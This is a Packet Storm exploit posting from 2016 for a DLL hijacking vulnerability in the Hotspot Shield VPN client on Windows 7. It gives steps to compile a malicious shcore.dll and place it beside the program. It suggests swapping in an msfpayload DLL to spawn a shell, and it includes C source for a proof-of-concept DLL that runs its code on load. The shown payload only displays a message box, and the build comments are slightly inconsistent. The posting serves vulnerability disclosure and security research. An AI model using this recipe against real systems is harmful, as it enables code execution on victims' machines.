Hotspot Shield suffers from a dll hijacking vulnerability.
734e59498529f65dd47e43719644d5b17369a52c20a7f1c17a1f20a1aa204c6b# Exploit Title: Hotspot Shield DLL Hijacking Exploit (shcore.dll )
# Date: 27-8-2016
# Author: Amir.ght
# Vendor Homepage: https://www.hotspotshield.com/
# Software Link:
https://mydati.com/download/hss-win2/HSS-773.exe
# Version:
# Tested on:Windows 7
----------------------------------------------------------------------------------------------------------
# 1. gcc malicious_dll.c -o shcore.dll -shared
# 2. Put shcore.dll in the same directory of Hotspot Shield program
# 3. You can generate a msfpayload DLL and spawn a shell, for example.
----------------------------------------------------------------------------------------------------------
# Exploit:
//gcc malicious_dll.dll -o shcore.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed